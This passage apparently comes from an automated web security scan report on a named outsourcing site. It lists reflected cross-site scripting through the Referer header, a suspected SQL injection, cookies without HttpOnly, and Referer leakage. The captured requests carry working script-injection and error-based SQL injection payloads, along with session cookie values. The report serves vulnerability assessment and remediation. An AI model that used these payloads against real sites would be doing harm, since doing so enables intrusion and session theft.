Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker86454240ba544e4fbfaa35b725c93778.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload ebab5<script>alert(1)</script>d3d540a0446 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Netsparker86454240ba544e4fbfaa35b725c93778.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=ebab5<script>alert(1)</script>d3d540a0446

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:25:06 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 7513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</script>d3d540a0446">ebab5<script>alert(1)</script>d3d540a0446</a>
...[SNIP]...

2.16. http://www.outsourcingdotnetdevelopment.com/Netsparker86454240ba544e4fbfaa35b725c93778.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparker86454240ba544e4fbfaa35b725c93778.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b8fa"><script>alert(1)</script>4cfa6b62c76 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Netsparker86454240ba544e4fbfaa35b725c93778.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=6b8fa"><script>alert(1)</script>4cfa6b62c76

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:25:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 7240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/.html" title="6b8fa"><script>alert(1)</script>4cfa6b62c76">
...[SNIP]...

2.17. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparkercfe7b9a5d67d488389828738d85656f2.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf2c1"><script>alert(1)</script>c4d3a9f67b5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Netsparkercfe7b9a5d67d488389828738d85656f2.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=cf2c1"><script>alert(1)</script>c4d3a9f67b5

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:25:02 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 6683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/.html" title="cf2c1"><script>alert(1)</script>c4d3a9f67b5">
...[SNIP]...

2.18. http://www.outsourcingdotnetdevelopment.com/Netsparkercfe7b9a5d67d488389828738d85656f2.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /Netsparkercfe7b9a5d67d488389828738d85656f2.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 1f635<script>alert(1)</script>1ad16fbec38 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Netsparkercfe7b9a5d67d488389828738d85656f2.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=1f635<script>alert(1)</script>1ad16fbec38

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:25:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 7076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</script>1ad16fbec38">1f635<script>alert(1)</script>1ad16fbec38</a>
...[SNIP]...

2.19. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 4209d<script>alert(1)</script>63ccf94baec146c0f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /outsourcing-dot-net-development-contact-us.html?p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3 HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=4209d<script>alert(1)</script>63ccf94baec146c0f
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:25 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 15086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
</script>63ccf94baec146c0f">4209d<script>alert(1)</script>63ccf94baec146c0f</a>
...[SNIP]...

2.20. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 97ae5<script>alert(1)</script>45e24329356 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=97ae5<script>alert(1)</script>45e24329356

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 13637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
</script>45e24329356">97ae5<script>alert(1)</script>45e24329356</a>
...[SNIP]...

2.21. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7373f"><script>alert(1)</script>d1a5d93dd12 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=7373f"><script>alert(1)</script>d1a5d93dd12

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 13278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html" title="7373f"><script>alert(1)</script>d1a5d93dd12">
...[SNIP]...

2.22. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c34e5"><script>alert(1)</script>877d9c910208441b1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /outsourcing-dot-net-development-contact-us.html?p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3 HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=c34e5"><script>alert(1)</script>877d9c910208441b1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:24:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 14348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html" title="c34e5"><script>alert(1)</script>877d9c910208441b1">
...[SNIP]...

3. SQL statement in request parameter

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

Request

POST /outsourcing-dot-net-development-contact-us.html HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 366

p_name=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3&G=Submit

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:20:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 11597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...

4. Cookie without HttpOnly flag set
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://www.outsourcingdotnetdevelopment.com/mail/captcha.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /mail/captcha.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=2j93q89hg8bokkcibvm5k8qof5; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mail/captcha.php HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Proxy-Connection: keep-alive
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 19 Feb 2011 13:09:51 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=2j93q89hg8bokkcibvm5k8qof5; path=/
Content-Type: image/jpeg
Content-Length: 851

...[SNIP]...

4.2. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=3kaph9nntlc0q0itqu1nu3js27; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /outsourcing-dot-net-development-contact-us.html?1'=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=3kaph9nntlc0q0itqu1nu3js27; path=/
Content-Type: text/html
Content-Length: 7083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...

5. Cross-domain Referer leakage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

POST /outsourcing-dot-net-development-contact-us.html?1'=' HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html?1'=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate
Content-Length: 104

p_name=Ronald+Smith&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 191732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
</a><a href="http://www.webapplicationdevelopmentcompanies.com/web-application-development.html" target="_blank" title="web application development,,">web application development</a><a href="http://www.rubysoftwaredevelopment.com/ruby-on-rails-development.html" target="_blank" title="ruby on rails development,ruby on rails developers,ruby on rails ruby developers">ruby on rails development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-jacksonville.html" target="_blank" title="mobile application development jacksonville,iphone,blackberry">mobile application development jacksonville</a>
...[SNIP]...
</a><a href="http://www.rubysoftwaredevelopment.com/sinatra-development.html" target="_blank" title="sinatra development,sinatra developers,sinatra ruby developers">sinatra development</a>
...[SNIP]...
</a><a href="http://www.pythonwebdevelopment.com/aquarium-development.html" target="_blank" title="aquarium development,aquarium developers,aquarium python developers">aquarium development</a>
...[SNIP]...
</a><a href="http://www.flashdevelopersindia.com/flex-application-development-india.html" target="_blank" title="flex application development india,flex web application development india,flex web programming india">flex application development india</a><a href="http://www.mobiledevelopmentindia.com/symbian-mobile-application-development.html" target="_blank" title="symbian mobile application development,symbian mobile software development india,offshore symbian mobile application development">symbian mobile application development</a><a href="http://www.mobiledevelopmentindia.com/about-us.html" target="_blank" title="mobile application development,software development outsourcing,offshore software development">mobile application development</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-columbus.html" target="_blank" title="mobile application development columbus,iphone,blackberry">mobile application development columbus</a><a href="http://www.flashdevelopersindia.com/hire-flash-developers-india.html" target="_blank" title="hire flash developers india,hire flash programmers india,hire flash professionals india">hire flash developers india</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-glasgow.html" target="_blank" title="mobile application development glasgow,iphone,blackberry">mobile application development glasgow</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-hyderabad.html" target="_blank" title="mobile application development hyderabad,iphone,blackberry">mobile application development hyderabad</a>
...[SNIP]...
</a><a href="http://www.pythonwebdevelopment.com/beautiful-soup-development.html" target="_blank" title="beautiful soup development,beautiful soup developers,beautiful soup python developers">beautiful soup development</a>
...[SNIP]...
</a><a href="http://www.webapplicationdevelopmentcompanies.com/ajax-web-application-development.html" target="_blank" title="ajax web application development,,">ajax web application development</a>
...[SNIP]...
</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-ontario.html" target="_blank" title="flash application development ontario,flash website development ontario,hire flash developers ontario">flash application development ontario</a><a href="http://www.outsourcewebapplicationdevelopment.com/outsource-web-development.html" target="_blank" title="outsource web development,,">outsource web development</a><a href="http://www.pythonwebdevelopment.com/django-development.html" target="_blank" title="django development,django developers,django python developers">django development</a><a href="http://www.applicationdevelopmentweb.com/web-application-development-qa-testing.html" target="_blank" title="web application testing,web application performance testing,web application load testing">web application testing</a><a href="http://www.flashapplicationdevelopment.com/flash-games-development.html" target="_blank" title="flash game development,flash game developers,flash animated games">flash game development</a><a href="http://www.outsourcewebapplicationdevelopment.com/web-application-development-outsourcing.html" target="_blank" title="web application development outsourcing,,">web application development outsourcing</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-richmond.html" target="_blank" title="mobile application development richmond,iphone,blackberry">mobile application development richmond</a><a href="http://www.mobiledevelopmentindia.com/mobile-application-development-sunnyvale.html" target="_blank" title="mobile application development sunnyvale,iphone,blackberry">mobile application development sunnyvale</a><a href="http://www.flashapplicationdevelopment.com/flash-development.html" target="_blank" title="flash development services,flash application development,flash website development">flash development services</a><a 
href="http://www.mobiledevelopmentindia.com/mobile-application-development-luxembourg.html" target="_blank" title="mobile application development luxembourg,iphone,blackberry">mobile application development luxembourg</a>
...[SNIP]...
</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-durham.html" target="_blank" title="flash application development durham,flash website development durham,hire flash developers durham">flash application development durham</a><a href="http://www.aspnetprogrammers.com/vici-mvc-development.html" target="_blank" title="vici mvc development,vici mvc developers,vici mvc .net developers">vici mvc development</a><a href="http://www.pythonwebdevelopment.com/plone-development.html" target="_blank" title="plone development,plone developers,plone python developers">plone development</a><a href="http://www.flashapplicationdevelopment.com/flash-application-development-manchester.html" target="_blank" title="flash application development manchester,flash website development manchester,hire flash developers manchester">flash application development manchester</a><a href="http://www.aspnetprogrammers.com/net-development-portfolio.html" target="_blank" title=".net development portfolio,.net software development portfolio,.net development services portfolio">.net development portfolio</a>
...[SNIP]...
</a><a href="http://www.phpsoftwaredevelopment.com/php-flash-integration.html" target="_blank" title="php & flash integration,,">php & flash integration</a>
...[SNIP]...
</a><a href="http://www.flashdevelopersindia.com/flash-website-development-india.html" target="_blank" title="flash website development india,flash web development india,flash web programming india">flash website development india</a>
...[SNIP]...
